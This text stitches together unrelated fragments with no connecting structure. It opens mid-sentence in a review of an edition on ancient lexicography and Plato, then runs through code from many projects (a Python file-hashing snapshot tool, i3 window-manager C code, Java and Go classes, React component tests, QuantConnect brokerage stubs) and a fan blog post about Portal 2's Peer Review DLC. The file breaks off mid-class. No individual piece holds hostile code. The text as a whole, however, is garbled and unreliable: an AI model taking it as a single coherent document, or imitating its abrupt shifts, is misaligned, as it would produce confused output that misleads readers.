as he does not give information about the date and textual state of several of the sources he mentions. A more accessible overview of the types of lexicographical activity current in antiquity is provided by J. Barnes’s introduction to Bonelli’s text and commentary. None the less, V.’s edition is an indispensable tool for those interested not only in ancient lexicography but also in the study of Plato and Platonic traditions.
#!/usr/bin/env python # coding=utf-8 # Created by: <NAME> # Created on: 5/25/20 import hashlib import os from configparser import ConfigParser from .parameterParser import upload_file_map, history_map def digest_check(file_path): """ Generate hash digest for a file :param file_path: :return: """ h = hashlib.blake2b() with open(file_path, "rb") as fh: for chunk in iter(lambda: fh.read(4096), b""): h.update(chunk) return h.hexdigest() def snapshot_a_job(job_path, input_files, db): """ Create snapshot for a job :param job_path: :param input_files: :param db: :return: """ snapshot = ConfigParser() snapshot.optionxform = str snapshot['input'] = dict() snapshot['output'] = dict() user_dir, _ = os.path.split(job_path) _, user_id = os.path.split(user_dir) if os.path.exists(job_path): for f in os.listdir(job_path): if f == ".snapshot.ini": continue full_path = os.path.join(job_path, f) if os.path.isfile(full_path): ctime = os.path.getctime(full_path) mtime = os.path.getmtime(full_path) digest = digest_check(full_path) snapshot['output'][f] = "%d;%d;%s" % (ctime, mtime, digest) parsed_uploaded_files, _ = upload_file_map(input_files, user_dir) parsed_history_files, _, _ = history_map(parsed_uploaded_files, user_id, db) parsed_inputs = parsed_history_files.split(";") for input_file in parsed_inputs: if os.path.exists(input_file) and os.path.isfile(input_file): ctime = os.path.getctime(input_file) mtime = os.path.getmtime(input_file) digest = digest_check(input_file) snapshot['input'][input_file] = "%d;%d;%s" % (ctime, mtime, digest) with open(os.path.join(job_path, ".snapshot.ini"), 'w') as configfile: snapshot.write(configfile)
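# A possible verification counterpart (illustrative; it relies only on the
# ".snapshot.ini" layout written above):
#
#   def output_changed(job_path):
#       snapshot = ConfigParser()
#       snapshot.optionxform = str
#       snapshot.read(os.path.join(job_path, ".snapshot.ini"))
#       for name, record in snapshot["output"].items():
#           _ctime, _mtime, digest = record.split(";")
#           if digest_check(os.path.join(job_path, name)) != digest:
#               return True
#       return False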
/*
 * vim:ts=4:sw=4:expandtab
 *
 * i3 - an improved dynamic tiling window manager
 * © 2009 <NAME> and contributors (see also: LICENSE)
 *
 */
#include "libi3.hpp"

#include <math.h>
#include <stdlib.h>
#include <string.h>

#include <xcb/xcb.h>
#include <xcb/xcb_aux.h>

/*
 * Try to get the contents of the given atom (for example I3_SOCKET_PATH) from
 * the X11 root window and return NULL if it doesn’t work.
 *
 * If the provided XCB connection is NULL, a new connection will be
 * established.
 *
 * The memory for the contents is dynamically allocated and has to be
 * free()d by the caller.
 *
 */
char *root_atom_contents(const char *atomname, xcb_connection_t *provided_conn, int screen) {
    xcb_intern_atom_cookie_t atom_cookie;
    xcb_intern_atom_reply_t *atom_reply;
    char *content = NULL;
    size_t content_max_words = 256;
    xcb_connection_t *conn = provided_conn;

    if (provided_conn == NULL &&
        ((conn = xcb_connect(NULL, &screen)) == NULL ||
         xcb_connection_has_error(conn))) {
        return NULL;
    }

    atom_cookie = xcb_intern_atom(conn, 0, strlen(atomname), atomname);

    xcb_screen_t *root_screen = xcb_aux_get_screen(conn, screen);
    xcb_window_t root = root_screen->root;

    atom_reply = xcb_intern_atom_reply(conn, atom_cookie, NULL);
    if (atom_reply == NULL) {
        goto out_conn;
    }

    xcb_get_property_cookie_t prop_cookie;
    xcb_get_property_reply_t *prop_reply;
    prop_cookie = xcb_get_property_unchecked(conn, false, root, atom_reply->atom,
                                             XCB_GET_PROPERTY_TYPE_ANY, 0, content_max_words);
    prop_reply = xcb_get_property_reply(conn, prop_cookie, NULL);
    if (prop_reply == NULL) {
        goto out_atom;
    }
    if (xcb_get_property_value_length(prop_reply) > 0 && prop_reply->bytes_after > 0) {
        /* We received an incomplete value. Ask again but with a properly
         * adjusted size. */
        content_max_words += ceil(prop_reply->bytes_after / 4.0);
        /* Repeat the request, with adjusted size */
        free(prop_reply);
        prop_cookie = xcb_get_property_unchecked(conn, false, root, atom_reply->atom,
                                                 XCB_GET_PROPERTY_TYPE_ANY, 0, content_max_words);
        prop_reply = xcb_get_property_reply(conn, prop_cookie, NULL);
        if (prop_reply == NULL) {
            goto out_atom;
        }
    }
    if (xcb_get_property_value_length(prop_reply) == 0) {
        goto out;
    }
    if (prop_reply->type == XCB_ATOM_CARDINAL) {
        /* We treat a CARDINAL as a >= 32-bit unsigned int. The only CARDINAL
         * we query is I3_PID, which is 32-bit. */
        sasprintf(&content, "%u", *((unsigned int *)xcb_get_property_value(prop_reply)));
    } else {
        sasprintf(&content, "%.*s", xcb_get_property_value_length(prop_reply),
                  (char *)xcb_get_property_value(prop_reply));
    }

out:
    free(prop_reply);
out_atom:
    free(atom_reply);
out_conn:
    if (provided_conn == NULL)
        xcb_disconnect(conn);
    return content;
}
/**
 * Returns a NewsFeedResponseItem that will be sent to the front end to handle grouped trip updates.
 *
 * @return newsFeedResponseItem sent to front end
 */
@Override
public CompletableFuture<NewsFeedResponseItem> execute() {
    return getUserProfileAsync().thenComposeAsync(profile ->
        getReferencedTripAsync().thenApplyAsync(trip -> {
            List<Destination> newDestinations = trip.tripDataList.stream()
                .filter(x -> newDestIds.contains(x.destination.id))
                .map(x -> x.destination)
                .filter(StreamHelper.distinctByKey(x -> x.id))
                .collect(Collectors.toList());

            ObjectNode returnObject = new ObjectNode(new JsonNodeFactory(false));
            returnObject.set("trip", Json.toJson(trip));
            returnObject.set("newDestinations", Json.toJson(newDestinations));

            return new NewsFeedResponseItem(
                String.format("added %d new destination%s to their trip!",
                    newDestinations.size(),
                    newDestinations.size() == 1 ? "" : "s"),
                profile.firstName + " " + profile.lastName,
                profile.profilePhoto,
                profile.userId,
                returnObject,
                eventIds);
        }));
}
package com.github.jira.commons.model;

import java.text.ParseException;
import java.util.Date;

import org.apache.commons.lang.ObjectUtils;
import org.apache.commons.lang.StringUtils;
import org.apache.commons.lang.builder.EqualsBuilder;
import org.apache.commons.lang.builder.HashCodeBuilder;

import com.github.jira.commons.util.DateUtils;

@SuppressWarnings("serial")
public class Version extends Entity {
  public static final String SELF = "self";
  public static final String ID = "id";
  public static final String DESCRIPTION = "description";
  public static final String NAME = "name";
  public static final String OVERDUE = "overdue";
  public static final String RELEASE_DATE = "releaseDate";
  public static final String ARCHIVED = "archived";
  public static final String RELEASED = "released";

  @Override
  public String toString() {
    return getName();
  }

  @Override
  public int hashCode() {
    return new HashCodeBuilder().append(getId()).toHashCode();
  }

  @Override
  public boolean equals(Object o) {
    if (o == null || o.getClass() != getClass()) {
      return false;
    }
    if (o == this) {
      return true;
    }
    Version target = (Version) o;
    return new EqualsBuilder().append(getId(), target.getId()).isEquals();
  }

  public String getSelf() {
    return StringUtils.defaultString((String) get(SELF));
  }

  public String getId() {
    return StringUtils.defaultString((String) get(ID));
  }

  public String getDescription() {
    return StringUtils.defaultString((String) get(DESCRIPTION));
  }

  public String getName() {
    return StringUtils.defaultString((String) get(NAME));
  }

  public boolean isOverdue() {
    return (Boolean) ObjectUtils.defaultIfNull(get(OVERDUE), false);
  }

  public Date getReleaseDate() {
    Object read = get(RELEASE_DATE);
    try {
      return (read != null) ? DateUtils.parseDate((String) read) : null;
    } catch (ParseException e) {
      return null;
    }
  }

  public boolean isArchived() {
    return (Boolean) ObjectUtils.defaultIfNull(get(ARCHIVED), false);
  }

  public boolean isReleased() {
    return (Boolean) ObjectUtils.defaultIfNull(get(RELEASED), false);
  }
}
def update_item(self, item_id, item_type, item_type_keywords, title,
                categories, snippet, description, license_info, tags,
                nb_path, runtime_stamp, thumbnail):
    item_properties = {"title": title,
                       "snippet": snippet,
                       "description": description,
                       "licenseInfo": license_info,
                       "tags": tags,
                       "properties": runtime_stamp}
    if categories:
        item_properties["categories"] = categories
    if item_type:
        item_properties['type'] = item_type
    if item_type_keywords:
        item_properties['typeKeywords'] = item_type_keywords

    existing_item = self._gis.content.get(item_id)
    if existing_item:
        log.debug(f'item {existing_item.homepage} exists, updating...')
        item_properties["url"] = existing_item.homepage
        existing_item.update(item_properties, data=nb_path, thumbnail=thumbnail)
        resp = existing_item
    else:
        raise Exception(f"Could not find item {item_id} to update. Failing!")
    return resp
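# Hypothetical call sketch for update_item() above. The `publisher` object,
# item id, and file paths are placeholders, and `self._gis` is assumed to be
# an authenticated arcgis.gis.GIS connection; only the parameter names mirror
# the method's own signature.
publisher.update_item(
    item_id="0123456789abcdef0123456789abcdef",  # hypothetical portal item id
    item_type="Notebook",
    item_type_keywords=["Notebook", "Python"],
    title="Nightly ETL notebook",
    categories=None,  # optional: left unset
    snippet="Refreshes the feature layer every night",
    description="Scheduled notebook that rebuilds the demo layer.",
    license_info="For internal use only",
    tags="etl,notebook,demo",
    nb_path="/tmp/etl.ipynb",
    runtime_stamp={"runtime": "2020-05-25T00:00:00Z"},
    thumbnail="/tmp/etl.png",
)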
After nearly 5 months (almost half a year, Jesus Christ), Valve has finally released the first Portal 2 DLC pack into the wild. Titled “Peer Review”, it features a new co-op testing course, or track, if you prefer: “Art Therapy”, it’s called. It takes place… well, that’s best left for you guys to discover.

The pack’s also got the brand new Challenge Mode, for both single-player and co-op. Much like Portal 1’s good old Challenges, except they finally got rid of that bulls**t “Least Steps” mode. God, I hated that thing. No new advanced chambers, however. As a matter of fact, there is no new single-player content here at all. There aren’t even any new hats!

And the online leaderboards? Well, you’ve got Friends leaderboards, but if you’re expecting huge ranked, worldwide leaderboards, like in Serious Sam HD or Hard Reset, then would you kindly lower your expectations, because the closest thing to that is a graph nestled in the Challenge Mode window. There’s also no way for you to see your previous high scores, or your friends’ previous high scores. It’s a good system, don’t get me wrong, but it’s lacking some pretty fundamental stuff.

In any case, let’s move on – there might be a full review of Peer Review on the way soon. You can expect to see another “Vic’s Thoughts On” kind of article for that. Except I’ll never put “Vic’s” in the title. And, hopefully, it won’t be as big. Or as critical. But stranger things have happened.

To celebrate Peer Review’s release, Portal 2 is now on sale through Thursday, at a good 50% off. That’s 15 dollars for one of the finest games of the year, or 11 euros, if you live in the United States of Europe. They don’t exist… yet. I’m sure that by the time Portal 2 takes place (52,000 AD? 2500 AD? 2050 AD?), there is a USE of sorts, and it is ruled by a sentient cloud. And they’ve always been at war with Oceania. Which is ruled by… what’s left of LambdaGeneration. Except the letters got smudged up during post-apocalyptic times and now people read it as “LlamaGeneration”. Crazy stuff.

The DLC should be downloaded to your game automatically, as a game update. The size is around 723 MB, so you should be able to get it fairly quickly (it took 2-3 minutes on my connection). And if you’re a console player, then you can probably pick the DLC up on the various online marketplaces. Again, completely free.

What are you waiting for, then? Call up your co-op partner, play some Challenge Mode in the meantime, and get ready for some… review! Of the “performed with a peer” kind! I have to admit, I might have just wasted that joke. Could have used it in my upcoming DLC review: “Let’s review Peer Review!”. Eh, that would have been pretty silly.

http://thinkwithportals.com/blog.php?id=6430
package types

import (
	"fmt"

	sdk "github.com/cosmos/cosmos-sdk/types"
	"github.com/cosmos/cosmos-sdk/x/auth"
)

// Tx represents an already existing blockchain transaction
type Tx struct {
	sdk.TxResponse
	Messages   []sdk.Msg   `json:"messages"`
	Fee        auth.StdFee `json:"fee"`
	Signatures []Signature `json:"signatures"`
	Memo       string      `json:"memo"`
}

// NewTx allows to create a new Tx instance from the given txResponse
func NewTx(txResponse sdk.TxResponse) (*Tx, error) {
	stdTx, ok := txResponse.Tx.(auth.StdTx)
	if !ok {
		return nil, fmt.Errorf("unsupported tx type: %T", txResponse.Tx)
	}

	// Convert Tendermint signatures into a more human-readable format
	sigs := make([]Signature, len(stdTx.Signatures))
	for i, sig := range stdTx.Signatures {
		sigs[i] = Signature{
			StdSignature: sig,
			Address:      sdk.AccAddress(sig.Address()).String(),
		}
	}

	return &Tx{
		TxResponse: txResponse,
		Fee:        stdTx.Fee,
		Messages:   stdTx.GetMsgs(),
		Signatures: sigs,
		Memo:       stdTx.Memo,
	}, nil
}

// FindEventByType searches inside the given tx events for the message having the specified index,
// in order to find the event having the given type, and returns it.
// If no such event is found, returns an error instead.
func (tx Tx) FindEventByType(index int, eventType string) (sdk.StringEvent, error) {
	for _, ev := range tx.Logs[index].Events {
		if ev.Type == eventType {
			return ev, nil
		}
	}
	return sdk.StringEvent{}, fmt.Errorf("no %s event found inside tx with hash %s", eventType, tx.TxHash)
}

// FindAttributeByKey searches inside the specified event of the given tx to find the attribute
// having the given key.
// If the specified event does not contain such an attribute, returns an error instead.
func (tx Tx) FindAttributeByKey(event sdk.StringEvent, attrKey string) (string, error) {
	for _, attr := range event.Attributes {
		if attr.Key == attrKey {
			return attr.Value, nil
		}
	}
	return "", fmt.Errorf("no event with attribute %s found inside tx with hash %s", attrKey, tx.TxHash)
}

// Signature wraps auth.StdSignature adding the address of the signer
type Signature struct {
	auth.StdSignature
	Address string `json:"address,omitempty"`
}
import os

import pygame


def loading_Images():
    """Load all of the game's images and return them keyed by name."""
    def loading_Image(img_file_name):
        file_name = os.path.join('.', 'images', img_file_name)
        img = pygame.image.load(file_name)
        # Surface.convert() returns a new converted surface rather than
        # converting in place, so the result must be kept.
        return img.convert()
    return {'game_background': loading_Image('background.png'),
            'endPipe': loading_Image('pipe_end.png'),
            'bodyPipe': loading_Image('pipe_body.png'),
            'WingUp': loading_Image('bird_wing_up.png'),
            'WingDown': loading_Image('bird_wing_down.png')}
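# Minimal usage sketch for loading_Images(), assuming the image files exist
# under ./images and that a display has been created first
# (pygame.Surface.convert() requires one). The window size is hypothetical.
import pygame

pygame.init()
screen = pygame.display.set_mode((284, 512))
images = loading_Images()
screen.blit(images['game_background'], (0, 0))
screen.blit(images['WingUp'], (50, 200))
pygame.display.flip()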
import * as React from 'react'
import { mount, shallow } from 'enzyme'
import { SynapseConstants } from '../../../lib/utils'
import UserCard, { UserCardProps } from '../../../lib/containers/UserCard'
import {
  UserCardSmall,
  UserCardSmallProps,
} from '../../../lib/containers/UserCardSmall'
import UserCardMedium, {
  UserCardMediumProps,
} from '../../../lib/containers/UserCardMedium'
import { UserCardLarge } from '../../../lib/containers/UserCardLarge'
import { mockUserProfileData } from '../../../mocks/mock_user_profile'
import UserCardContextMenu, {
  UserCardContextMenuProps,
  MenuAction,
} from '../../../lib/containers/UserCardContextMenu'
import { SEPERATOR } from '../../../lib/utils/SynapseConstants'

const { firstName } = mockUserProfileData

const createUserCardContextMenu = (props: UserCardContextMenuProps) => {
  const wrapper = shallow(<UserCardContextMenu {...props} />)
  return { wrapper }
}

const createLargeComponent = (props: UserCardMediumProps) => {
  const wrapper = shallow<UserCardMedium>(
    <UserCardMedium {...props} isLarge={true} />,
  )
  const instance = wrapper.instance()
  return { wrapper, instance }
}

const createMediumComponent = (props: UserCardMediumProps) => {
  const wrapper = shallow<UserCardMedium>(<UserCardMedium {...props} />)
  const instance = wrapper.instance()
  return { wrapper, instance }
}

const createSmallComponent = (props: UserCardSmallProps) => {
  const wrapper = shallow(<UserCardSmall {...props} />)
  const instance = wrapper.instance()
  return { wrapper, instance }
}

// need mount because of the deep render of the children
const createMountedComponent = (props: UserCardProps) => {
  const wrapper = mount<UserCard>(<UserCard {...props} />)
  const instance = wrapper.instance()
  return { wrapper, instance }
}

describe('it renders the different sized cards without failing', () => {
  const props = {
    userProfile: mockUserProfileData,
  }

  it('renders a small card', () => {
    const size = SynapseConstants.SMALL_USER_CARD
    const { wrapper } = createMountedComponent({ ...props, size })
    expect(wrapper).toBeDefined()
    expect(wrapper.find(UserCardSmall)).toHaveLength(1)
  })

  it('renders a medium card', () => {
    const size = SynapseConstants.MEDIUM_USER_CARD
    const { wrapper } = createMountedComponent({ ...props, size })
    expect(wrapper).toBeDefined()
    expect(wrapper.find(UserCardMedium)).toHaveLength(1)
  })

  it('renders a large card', () => {
    const size = SynapseConstants.LARGE_USER_CARD
    const { wrapper } = createMountedComponent({ ...props, size })
    expect(wrapper).toBeDefined()
    expect(wrapper.find(UserCardLarge)).toHaveLength(1)
  })
})

describe('it creates the correct UI for the small card', () => {
  const props = {
    userProfile: mockUserProfileData,
    size: SynapseConstants.SMALL_USER_CARD,
  }

  it('displays a div with text for a user without an img', () => {
    const { wrapper } = createSmallComponent({ ...props })
    expect(wrapper.render().find('div.SRC-userImgSmall')).toHaveLength(1)
    expect(
      wrapper
        .render()
        .find('div.SRC-userImgSmall')
        .text(),
    ).toEqual(firstName[0])
  })

  it('displays an img for a user with an img set', () => {
    const { wrapper } = createSmallComponent({
      ...props,
      preSignedURL: 'link-to-user-img.com',
    })
    expect(wrapper.render().find('div.SRC-userImgSmall')).toHaveLength(1)
  })

  it("doesn't hide text by default", () => {
    const { wrapper } = createSmallComponent({
      ...props,
      preSignedURL: 'link-to-user-img.com',
    })
    expect(wrapper.render().find('span.SRC-primary-text-color')).toHaveLength(1)
  })

  it('hides text when hideText is set to true', () => {
    const { wrapper } = createSmallComponent({
      ...props,
      preSignedURL: 'link-to-user-img.com',
      hideText: true,
    })
    expect(wrapper.render().find('span.SRC-primary-text-color')).toHaveLength(0)
  })
})

describe('it creates the correct UI for the medium card', () => {
  const props = {
    userProfile: mockUserProfileData,
    size: SynapseConstants.MEDIUM_USER_CARD,
  }

  it('displays an svg for a user without an img', () => {
    const { wrapper } = createMediumComponent({ ...props })
    // one svg is for the clipboard icon, the other is for the user
    expect(wrapper.render().find('div.SRC-userImg')).toHaveLength(1)
    expect(
      wrapper
        .render()
        .find('div.SRC-userImg')
        .text(),
    ).toEqual(firstName[0])
  })

  it('displays an img for a user with an img set', () => {
    const { wrapper } = createMediumComponent({
      ...props,
      preSignedURL: 'my-img-url',
    })
    expect(wrapper.render().find('div.SRC-userImg')).toHaveLength(1)
  })

  it("doesn't hide user email by default", () => {
    const { wrapper } = createMediumComponent({ ...props })
    expect(wrapper.render().find('p.SRC-emailText')).toHaveLength(1)
  })

  it('hides user email when hideEmail is set', () => {
    const { wrapper } = createMediumComponent({ ...props, hideEmail: true })
    expect(wrapper.render().find('p.SRC-emailText')).toHaveLength(0)
  })

  it('displays the context menu on toggle', async () => {
    const menuActions = [
      {
        field: 'text',
        callback: () => {},
      },
    ] as MenuAction[]
    const { wrapper } = createMediumComponent({ ...props, menuActions })
    expect(wrapper.render().find('.SRC-menu-wall')).toHaveLength(0)
    const instance = wrapper.instance() as UserCardMedium
    const _event = {} as any
    await instance.toggleContextMenu(_event)
    expect(wrapper.render().find('div.dropdown')).toHaveLength(1)
  })
})

describe('it creates the correct UI for the UserCardContextMenu', () => {
  const props = {
    userProfile: mockUserProfileData,
  }

  it('renders without crashing', () => {
    const menuActions = [
      {
        field: 'text',
        callback: () => {},
      },
    ] as MenuAction[]
    const { wrapper } = createUserCardContextMenu({ ...props, menuActions })
    // one svg is for the clipboard icon, one for the ellipsis,
    // and one is for the user svg
    expect(wrapper).toBeDefined()
  })

  it('renders a break with SEPERATOR in menuActions', () => {
    const menuActions = [
      {
        field: 'text',
        callback: () => {},
      },
      {
        field: SEPERATOR,
        callback: () => {},
      },
      {
        field: 'other text',
        callback: () => {},
      },
    ] as MenuAction[]
    const { wrapper } = createUserCardContextMenu({ ...props, menuActions })
    expect(wrapper.find('hr.SRC-break')).toHaveLength(1)
  })
})

describe('it creates the correct UI for the large card', () => {
  const props = {
    userProfile: mockUserProfileData,
    size: SynapseConstants.LARGE_USER_CARD,
  }

  it("displays the user's information", async () => {
    const { wrapper } = createLargeComponent({ ...props })
    expect(wrapper.render().find('div.SRC-cardMetaData')).toHaveLength(1)
    // only two fields are set for the mock profile, so there should only be two
    // fields shown
    expect(
      wrapper
        .render()
        .find('div.SRC-cardMetaData')
        .children(),
    ).toHaveLength(2)
  })
})
__all__ = [
    "SetDescriptionReferenceAttribute",
    "DOp_SetPCIIdAttr",
    "DOp_SetAttr"
]

from .project_editing import (
    DescriptionOperation
)
from copy import (
    deepcopy as dcp
)
from common import (
    mlget as _
)
from .pci_ids import (
    PCIVendorId,
    PCIDeviceId,
    PCIClassId
)


class DOp_SetAttr(DescriptionOperation):

    def __init__(self, attribute_name, new_value, *args, **kw):
        DescriptionOperation.__init__(self, *args, **kw)
        self.attr = str(attribute_name)
        self.val = dcp(new_value)

    def __read_set__(self):
        return DescriptionOperation.__read_set__(self) + [self.sn]

    def __write_set__(self):
        return DescriptionOperation.__write_set__(self) + [(self.sn, str(self.attr))]

    def _backup(self):
        self.old_val = dcp(getattr(self.find_desc(), self.attr))

    def _do(self):
        setattr(self.find_desc(), self.attr, dcp(self.val))

    def _undo(self):
        setattr(self.find_desc(), self.attr, dcp(self.old_val))

    def _description(self):
        attr = self.attr
        if attr == "name":
            name = self.old_val
        else:
            name = self.find_desc().name

        return _("Set '%s' of '%s' to '%s'.") % (attr, name, str(self.val))


class SetDescriptionReferenceAttribute(DescriptionOperation):

    def __init__(self, attribute_name, new_value, *args, **kw):
        DescriptionOperation.__init__(self, *args, **kw)
        self.attr = str(attribute_name)
        self.val = new_value

    def __read_set__(self):
        # Note that new referenced value is probably to be in read set.
        return DescriptionOperation.__read_set__(self) + [self.sn]

    def __write_set__(self):
        return DescriptionOperation.__write_set__(self) + [(self.sn, str(self.attr))]

    def _backup(self):
        self.old_val = getattr(self.find_desc(), self.attr)

    def _do(self):
        setattr(self.find_desc(), self.attr, self.val)

    def _undo(self):
        setattr(self.find_desc(), self.attr, self.old_val)


def get_pci_id_kind_str(pci_id):
    if type(pci_id) is PCIVendorId:
        return _("vendor")
    elif type(pci_id) is PCIDeviceId:
        return _("device")
    elif type(pci_id) is PCIClassId:
        return _("class")


def gen_pci_id_str(pci_id):
    return _("%s %s (%s)") % (
        get_pci_id_kind_str(pci_id), pci_id.name, pci_id.id
    )


class DOp_SetPCIIdAttr(SetDescriptionReferenceAttribute):

    def _description(self):
        name = self.find_desc().name

        if self.old_val is None:
            return _("Set '%s' of '%s' to %s") % (
                self.attr, name, gen_pci_id_str(self.val)
            )
        elif self.val is None:
            return _("Reset '%s' of '%s'.") % (self.attr, name)
        else:
            return _("Change '%s' of '%s' from %s to %s") % (
                self.attr, name, gen_pci_id_str(self.old_val),
                gen_pci_id_str(self.val)
            )
package prefetcher

// TODO visibility

import (
	"fmt"
)

type node struct {
	URI        string
	AccessFreq int
	// TODO change this to a linked list?
	Children []*node
}

func newNode(URI string) *node {
	return &node{URI: URI, AccessFreq: 0}
}

func (n *node) getChild(URI string) *node {
	for _, child := range n.Children {
		if child.URI == URI {
			return child
		}
	}
	return nil
}

func (n *node) addChild(child *node) {
	n.Children = append(n.Children, child)
}

// TODO remove
func (n *node) printChilderen() {
	for _, c := range n.Children {
		fmt.Print(c.URI, " ")
	}
	fmt.Println(" ")
}

// TODO naming; this is a bit more than just a trie
/* suffix trie */
type Trie struct {
	root        *node
	curentTrace circulairArray
	savedTrace  []string
	uid         string
}

func NewTrie(uid string) *Trie {
	t := Trie{
		root:        nil,
		curentTrace: newCirculairArray(),
		uid:         uid,
	}
	t.buildTrie()
	return &t
}

func (t *Trie) SaveTrie() error {
	return writeUserTrace(t.uid, t.curentTrace.getDataAsSlice())
}

func (t *Trie) ProcessRequest(URI string) {
	t.curentTrace.pushBack(URI)
	t.predictNext(true)
}

func (t *Trie) buildTrie() {
	t.savedTrace, _ = getUserTrace(t.uid)
	t.root = newNode("root")
	for i := 0; i < len(t.savedTrace); i++ {
		t.addSuffix(i)
	}
}

func (t *Trie) addSuffix(pos int) {
	currentNode := t.root
	var nextNode *node
	// TODO is using slices efficient enough? see also predictNext
	for _, URI := range t.savedTrace[pos:] {
		nextNode = currentNode.getChild(URI)
		if nextNode == nil {
			nextNode = newNode(URI)
			currentNode.addChild(nextNode)
		}
		currentNode = nextNode
	}
}

// TODO refactor
func (t *Trie) predictNext(recursive bool) {
	trace := t.curentTrace.getDataAsSlice()
	var currentNode *node
	var matched bool

	fmt.Println(t.curentTrace.getDataAsSlice())

	for i := 0; i < len(trace); i++ {
		if len(trace)-i < MIN_URI_MATCHES {
			break
		}
		currentNode = t.root
		matched = true
		fmt.Println("Matching: ", trace[i:])
		for _, URI := range trace[i:] {
			currentNode = currentNode.getChild(URI)
			if currentNode == nil {
				matched = false
				break
			}
		}
		if !recursive || matched {
			fmt.Print("Matched in ", i, "th iteration")
			break
		}
	}

	if currentNode == nil {
		fmt.Println("pattern not matched")
	} else {
		currentNode.printChilderen()
	}
}
from .__Brokerages_1 import *
import typing
import System.Collections.Generic
import System
import QuantConnect.Securities
import QuantConnect.Packets
import QuantConnect.Orders.Slippage
import QuantConnect.Orders.Fills
import QuantConnect.Orders.Fees
import QuantConnect.Orders
import QuantConnect.Interfaces
import QuantConnect.Data.Market
import QuantConnect.Brokerages
import QuantConnect
import datetime

# no functions
# classes

class DefaultBrokerageModel(System.object, QuantConnect.Brokerages.IBrokerageModel):
    """
    Provides a default implementation of QuantConnect.Brokerages.IBrokerageModel that allows all orders and uses the default transaction models

    DefaultBrokerageModel(accountType: AccountType)
    """
    def ApplySplit(self, tickets: typing.List[QuantConnect.Orders.OrderTicket], split: QuantConnect.Data.Market.Split) -> None:
        pass

    def CanExecuteOrder(self, security: QuantConnect.Securities.Security, order: QuantConnect.Orders.Order) -> bool:
        pass

    def CanSubmitOrder(self, security: QuantConnect.Securities.Security, order: QuantConnect.Orders.Order, message: QuantConnect.Brokerages.BrokerageMessageEvent) -> bool:
        pass

    def CanUpdateOrder(self, security: QuantConnect.Securities.Security, order: QuantConnect.Orders.Order, request: QuantConnect.Orders.UpdateOrderRequest, message: QuantConnect.Brokerages.BrokerageMessageEvent) -> bool:
        pass

    @typing.overload
    def GetBuyingPowerModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Securities.IBuyingPowerModel:
        pass

    @typing.overload
    def GetBuyingPowerModel(self, security: QuantConnect.Securities.Security, accountType: QuantConnect.AccountType) -> QuantConnect.Securities.IBuyingPowerModel:
        pass

    def GetBuyingPowerModel(self, *args) -> QuantConnect.Securities.IBuyingPowerModel:
        pass

    def GetFeeModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Orders.Fees.IFeeModel:
        pass

    def GetFillModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Orders.Fills.IFillModel:
        pass

    def GetLeverage(self, security: QuantConnect.Securities.Security) -> float:
        pass

    @typing.overload
    def GetSettlementModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Securities.ISettlementModel:
        pass

    @typing.overload
    def GetSettlementModel(self, security: QuantConnect.Securities.Security, accountType: QuantConnect.AccountType) -> QuantConnect.Securities.ISettlementModel:
        pass

    def GetSettlementModel(self, *args) -> QuantConnect.Securities.ISettlementModel:
        pass

    def GetSlippageModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Orders.Slippage.ISlippageModel:
        pass

    def __init__(self, accountType: QuantConnect.AccountType) -> QuantConnect.Brokerages.DefaultBrokerageModel:
        pass

    AccountType: QuantConnect.AccountType
    DefaultMarkets: System.Collections.Generic.IReadOnlyDictionary[QuantConnect.SecurityType, str]
    RequiredFreeBuyingPowerPercent: float
    DefaultMarketMap: ReadOnlyDictionary[SecurityType, str]


class AlpacaBrokerageModel(QuantConnect.Brokerages.DefaultBrokerageModel, QuantConnect.Brokerages.IBrokerageModel):
    """
    Alpaca Brokerage Model Implementation for Back Testing.

    AlpacaBrokerageModel(orderProvider: IOrderProvider, accountType: AccountType)
    """
    def CanSubmitOrder(self, security: QuantConnect.Securities.Security, order: QuantConnect.Orders.Order, message: QuantConnect.Brokerages.BrokerageMessageEvent) -> bool:
        pass

    def GetFeeModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Orders.Fees.IFeeModel:
        pass

    def GetFillModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Orders.Fills.IFillModel:
        pass

    def GetSlippageModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Orders.Slippage.ISlippageModel:
        pass

    def __init__(self, orderProvider: QuantConnect.Securities.IOrderProvider, accountType: QuantConnect.AccountType) -> QuantConnect.Brokerages.AlpacaBrokerageModel:
        pass

    DefaultMarkets: System.Collections.Generic.IReadOnlyDictionary[QuantConnect.SecurityType, str]
    DefaultMarketMap: ReadOnlyDictionary[SecurityType, str]


class AlphaStreamsBrokerageModel(QuantConnect.Brokerages.DefaultBrokerageModel, QuantConnect.Brokerages.IBrokerageModel):
    """
    Provides properties specific to Alpha Streams

    AlphaStreamsBrokerageModel(accountType: AccountType)
    """
    def GetFeeModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Orders.Fees.IFeeModel:
        pass

    def GetLeverage(self, security: QuantConnect.Securities.Security) -> float:
        pass

    @typing.overload
    def GetSettlementModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Securities.ISettlementModel:
        pass

    @typing.overload
    def GetSettlementModel(self, security: QuantConnect.Securities.Security, accountType: QuantConnect.AccountType) -> QuantConnect.Securities.ISettlementModel:
        pass

    def GetSettlementModel(self, *args) -> QuantConnect.Securities.ISettlementModel:
        pass

    def GetSlippageModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Orders.Slippage.ISlippageModel:
        pass

    def __init__(self, accountType: QuantConnect.AccountType) -> QuantConnect.Brokerages.AlphaStreamsBrokerageModel:
        pass


class BitfinexBrokerageModel(QuantConnect.Brokerages.DefaultBrokerageModel, QuantConnect.Brokerages.IBrokerageModel):
    """
    Provides Bitfinex specific properties

    BitfinexBrokerageModel(accountType: AccountType)
    """
    @typing.overload
    def GetBuyingPowerModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Securities.IBuyingPowerModel:
        pass

    @typing.overload
    def GetBuyingPowerModel(self, security: QuantConnect.Securities.Security, accountType: QuantConnect.AccountType) -> QuantConnect.Securities.IBuyingPowerModel:
        pass

    def GetBuyingPowerModel(self, *args) -> QuantConnect.Securities.IBuyingPowerModel:
        pass

    def GetFeeModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Orders.Fees.IFeeModel:
        pass

